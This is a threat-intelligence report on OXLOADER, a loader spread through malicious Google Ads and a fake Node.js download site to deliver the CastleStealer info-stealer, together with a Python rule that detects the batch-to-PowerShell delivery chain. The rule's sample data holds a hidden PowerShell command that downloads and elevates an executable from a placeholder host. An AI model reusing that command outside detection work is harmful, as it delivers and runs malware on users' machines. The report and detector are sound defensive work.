Cybersecurity experts have identified a new malware loader, dubbed OXLOADER, which is being used to distribute the CastleStealer information-stealing malware. This campaign leverages malicious Google Ads to lure users into downloading the malware.
The attack begins when users search for terms like “lts version of node.js” on Google. Malicious ads, appearing under the verified name “ВОЛОДИМИР ТЕРЕЩЕНКО,” redirect users to a counterfeit website, node-js[.]prentiva99[.]info. It’s unclear whether this advertiser account is directly linked to the threat actors or if it’s a front or purchased identity. Google removed the advertiser account and its associated campaigns on May 14, 2026.
Once on the fake site, users are prompted to download a batch script hosted on Storj, a decentralized cloud storage platform. This script displays a fake installation wizard while covertly executing a PowerShell command to download and run OXLOADER with elevated privileges, triggering a Windows User Account Control (UAC) prompt.
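The delivery chain above (a downloaded batch script that spawns PowerShell to fetch a payload and request elevation, producing the UAC prompt) is the kind of parent/child process pattern endpoint telemetry can flag. The following is an added detection example, not code from the article or the researchers; the event fields, file names, and the PLACEHOLDER URL are constructed, and the elevation is assumed to use PowerShell's `Start-Process -Verb RunAs`.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcessEvent:
    """One process-creation record (Sysmon EID 1 style fields, constructed)."""
    parent_image: str
    parent_cmdline: str
    image: str
    cmdline: str

BATCH_PARENT = re.compile(r"\.(bat|cmd)\b", re.I)
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
DOWNLOAD = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadString|DownloadFile|Start-BitsTransfer|\bcurl\b", re.I)
ELEVATE = re.compile(r"-Verb\s+RunAs", re.I)  # assumption: elevation via Start-Process -Verb RunAs

def chain_reasons(ev: ProcessEvent) -> list[str]:
    """Name each stage of the batch -> PowerShell download -> elevation chain the event shows."""
    reasons = []
    if ev.parent_image.lower().endswith("\\cmd.exe") and BATCH_PARENT.search(ev.parent_cmdline):
        reasons.append("batch-script parent")
    if POWERSHELL.search(ev.image):
        if DOWNLOAD.search(ev.cmdline):
            reasons.append("download cradle")
        if ELEVATE.search(ev.cmdline):
            reasons.append("elevation request")
    return reasons

def is_suspicious(ev: ProcessEvent) -> bool:
    """Alert only when all three stages are present, so build scripts that merely download stay quiet."""
    return len(chain_reasons(ev)) == 3

def triage(events: list[ProcessEvent]) -> list[int]:
    """Return the indices of events showing the complete chain."""
    return [i for i, ev in enumerate(events) if is_suspicious(ev)]

SAMPLE_EVENTS = [  # constructed telemetry, not from the campaign
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r'cmd.exe /c "C:\Users\dev\Downloads\node-lts-setup.bat"',
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -w hidden -c "iwr https://PLACEHOLDER.invalid/s.exe -OutFile $env:TEMP\\s.exe; '
                 'Start-Process $env:TEMP\\s.exe -Verb RunAs"'),
    ProcessEvent(r"C:\Windows\System32\cmd.exe", "cmd.exe /c build.bat",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 'powershell.exe -c "iwr https://example.com/deps.zip -OutFile deps.zip"'),
    ProcessEvent(r"C:\Windows\explorer.exe", "explorer.exe",
                 r"C:\Program Files\PowerShell\7\pwsh.exe", 'pwsh.exe -c "Get-ChildItem"'),
]

if __name__ == "__main__":
    for i in triage(SAMPLE_EVENTS):
        print(i, chain_reasons(SAMPLE_EVENTS[i]))
```

Only the first constructed event trips the rule; the second shows a benign download from a batch file and is reported with two of three stages, which is useful for hunting without alerting.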
OXLOADER employs DLL side-loading to execute a malicious DLL, which decrypts and runs the CastleStealer payload. To evade detection, OXLOADER uses advanced obfuscation techniques, including control-flow flattening, mixed Boolean-arithmetic (MBA) expressions, and self-modifying decryption stubs. It also implements anti-virtual-machine checks to avoid sandbox analysis.
CastleStealer, a .NET-based information stealer, has been previously distributed alongside CastleLoader in campaigns masquerading as free image-editing tools. The current campaign, codenamed REF8372, appears to be financially motivated and likely operated by Russian-speaking actors, as indicated by exclusions designed to prevent infections in the Commonwealth of Independent States (CIS) region.
The emergence of OXLOADER highlights the evolving tactics of cybercriminals who exploit legitimate platforms like Google Ads and Storj to distribute malware. This underscores the importance of vigilance when downloading software and the need for robust cybersecurity measures to detect and prevent such sophisticated attacks.